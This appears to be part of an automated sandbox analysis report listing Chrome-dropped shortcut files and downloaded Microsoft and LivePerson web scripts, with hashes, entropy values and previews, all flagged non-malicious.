                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......V.7S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 22:35:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                          Entropy (8bit):3.990922406870842
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:87dITsUQHlidAKZdA1weh/iZUkAQkqehxy+2:8CP49QEy
                                                                                                                                                                                                                                                          MD5:FF1D899F4B6534F350CE7AE7FCE5D64A
                                                                                                                                                                                                                                                          SHA1:F6B532FA4F34695D10CF7EB03ED3AF57EE649682
                                                                                                                                                                                                                                                          SHA-256:B8A370830C3145AEE2CB216C6C40544A3DD91EA8F1CDABC48C7FF8A6CB2C1FA2
                                                                                                                                                                                                                                                          SHA-512:892243E0B425FBCD2DD1BA1A7CEC531E4097EC87F665B239DCAA09112287E2580BCC6A49FD7427DDB190FBDC11F42CED8A6150A588E42F4C3DD824A0664E6B3E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......J.7S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                                                                                                          Entropy (8bit):4.004276093563018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8xNdITsUsHlidAKZdA14tseh7sFiZUkmgqeh7sny+BX:8xIPsndy
                                                                                                                                                                                                                                                          MD5:9813E9F366026622238341144B95B824
                                                                                                                                                                                                                                                          SHA1:E0ADDA3C34EBD364A93FB4A1695297B4C381E517
                                                                                                                                                                                                                                                          SHA-256:C2B915A23A68B103EECAAB2AF41AC056EEE2C242A78A1D5BC14F492B2EE58FAE
                                                                                                                                                                                                                                                          SHA-512:DA31404198DA9B55C82D3C1B064A758585AD03DAC6080FDB596D91F460E9A67166F43F390F823A123B9CACDB195EF60C13E58965BDC5AFFC40D949B19E8524F5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 22:35:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                          Entropy (8bit):3.9882630148626528
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8mdITsUQHlidAKZdA1vehDiZUkwqehFy+R:8JPjvy
                                                                                                                                                                                                                                                          MD5:39B34B205AC5B000FDEC925F7F90333D
                                                                                                                                                                                                                                                          SHA1:02754950956B92C50474DB47EC23BDF1F3F7AFE5
                                                                                                                                                                                                                                                          SHA-256:49BB8C09BB78468AB7C5948BD9C6F71A8BB94586621352F09F60FCA74792568B
                                                                                                                                                                                                                                                          SHA-512:20B655F1D7F592A6E2DCBFABD14F62F576C66ED1685277A6E9E8E19066A679F62B67F8259FE5A68D613C8E625904166271FD3B52E726BD050736BCAD0E064557
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......C.7S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 22:35:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                          Entropy (8bit):3.9809643771282186
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:85dITsUQHlidAKZdA1hehBiZUk1W1qehTy+C:8UPz9zy
                                                                                                                                                                                                                                                          MD5:13D025FD1292C9CE873702621AE04172
                                                                                                                                                                                                                                                          SHA1:E79F437BE40787551ED0C9C85C442A78160B6ABB
                                                                                                                                                                                                                                                          SHA-256:B18BAF426ABB07D9A388DFA7017F7C5D01B9B748B4311E74831EAFC9745A7B3F
                                                                                                                                                                                                                                                          SHA-512:233956C1A7A2026A4FB3A62C0CFFCC5E02DC8D54E33DF3684AD60A52DA56C8E6D4E5E11ABFE0E3F906DA92004DAF6B0A44E768DE557C91C8267C5BAFDEDF9512
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......Q.7S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 20 22:35:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                                                                                          Entropy (8bit):3.9878569162033894
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:8/NdITsUQHlidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbdy+yT+:8gPjT/TbxWOvTbdy7T
                                                                                                                                                                                                                                                          MD5:CEAE76211217EADFC515DB62AB79196A
                                                                                                                                                                                                                                                          SHA1:36F708204E80F12F535FE0FAC7F9CACB7DA12699
                                                                                                                                                                                                                                                          SHA-256:E22D081792F46D1C40072515614AC7F902C841C23E625076C25FCB989AE63207
                                                                                                                                                                                                                                                          SHA-512:69AC053BDDDA29E7C4190EC6D14E4C57E35D97F4B42FED0A458AB2CBD9670256F0D2DA15AEDC727032F5A1BB6AB7C431028D57E29564AE335B0C176ADF6C0C07
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....T.:.7S..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Yr.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yr.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yr.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yr............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yt............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........|..U.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (526)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1683
                                                                                                                                                                                                                                                          Entropy (8bit):4.981226266363334
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:vvJ/iwjBViZF/HGbP4aSnlS9DT/PY11oBJ:nJ6MTmF/HegaSMZ
                                                                                                                                                                                                                                                          MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                                                                                                                                          SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                                                                                                                                          SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                                                                                                                                          SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):2436
                                                                                                                                                                                                                                                          Entropy (8bit):4.675816652909621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:sebcrpamZrX1/W4/PiIgpzCzj12SoOTj+/3cuq2VqP:seslX1/WIks1Ho8+P1qt
                                                                                                                                                                                                                                                          MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                                                                                                                                          SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                                                                                                                                          SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                                                                                                                                          SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-ajaxutil.min.ACSHASH3473c7d90bd072edee7d20686eb3fd28.js
                                                                                                                                                                                                                                                          Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):39
                                                                                                                                                                                                                                                          Entropy (8bit):4.2504143220263435
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:6JRASKDeI+CK9To+:6fAveIyTo+
                                                                                                                                                                                                                                                          MD5:D66C468F4CA17E83CCD97A4518B3E814
                                                                                                                                                                                                                                                          SHA1:2E657440F653DA65E699AC9230D82FAEE414D8A5
                                                                                                                                                                                                                                                          SHA-256:8E1CE663720F6AFB2DEE29B587D3F7559EA89BC622F966120C9F108172A5C866
                                                                                                                                                                                                                                                          SHA-512:FC012A375F871892839D547D3FB3D38B58C2542B0F32FB005A7CADCA7ECD676D1626F3CE79E2DD24890B02162EF7C2B8A877049CE7865B9B83C7FFDA9C40FBBF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-aem-styles.min.ACSHASHd66c468f4ca17e83ccd97a4518b3e814.css
                                                                                                                                                                                                                                                          Preview:.xf-content-height{margin:0 !important}
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5006
                                                                                                                                                                                                                                                          Entropy (8bit):5.254875250489264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:tYVv5eMnTpQA9CsC9MCCu2Axzwxf1QiEbyhTlZhZF4ntl:tOwMTpP9jUnN2Izwxf1hhTNZF4ntl
                                                                                                                                                                                                                                                          MD5:2954890B89E77EADECA4558085241308
                                                                                                                                                                                                                                                          SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                                                                                                                                                                                                          SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                                                                                                                                                                                                          SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32098)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):143130
                                                                                                                                                                                                                                                          Entropy (8bit):5.330341741940889
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:dq6o9bcpWoraMVwSrutmMiA+78ffv1N0w9h5fGTWOctxEPEtqQw/etDdgnGOY:2c2fv1N0w9hxxEPEtqQw/4KnGP
                                                                                                                                                                                                                                                          MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                                                                                                                                                                                                          SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                                                                                                                                                                                                          SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                                                                                                                                                                                                          SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHb2193ee3d1a572c4de0275bb103c5293.js
                                                                                                                                                                                                                                                          Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1818)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):185145
                                                                                                                                                                                                                                                          Entropy (8bit):5.263515273204495
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:7Pv4giw/1v1MlRNUAHeVFd3F9mxCmy7md2svbrfEfGviId79BhBjBO:7Pi+V1md2UrfEfQrNO
                                                                                                                                                                                                                                                          MD5:8F54371F05BC32A5CBCF5D92B52B9432
                                                                                                                                                                                                                                                          SHA1:E48D06AB8E24219379EB8936C15CCA6DACB68BB3
                                                                                                                                                                                                                                                          SHA-256:977046592B00D4B3569B963B568C06C557E58E9BD806D2D68A37E9561E2114C5
                                                                                                                                                                                                                                                          SHA-512:D423C6B105B776AC7CB213841EC5B5B97D42A3E13F848A28AC8BBD88847C07ABF44F7D3B8ABEB01E8D32FA5667336C6F4199E715CB33EF32A0CF75DF1F963F68
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://publisher.liveperson.net/iframe-le-tag/iframe-cs.html?lpsite=60270350&lpsection=powerplatform-presales-en-us&buttons=lpPowerPlatform
                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang='en'>.<head> ..<title>iFrame Cart Page</title>..<meta charset='utf-8'>..<meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>..<meta name="format-detection" content="telephone=no"/>....<meta name='viewport' content='width=device-width, height=device-height, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no'/>...<style>.../*Empty MR3*/...body {....background-image:url('https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_75.gif');....background-repeat: no-repeat;....background-attachment: fixed;....background-position: center;....background-color: #f2f2f2;....margin: 0;...}....@font-face {....font-family: "Segoe UI";....src: url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format('woff');...}......* {....font-family: "Segoe UI", Arial, sans-serif !important;...}....body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {....colo
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (541)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3642
                                                                                                                                                                                                                                                          Entropy (8bit):5.399452635270733
                                                                                                                                                                                                                                                          Encrypted:false
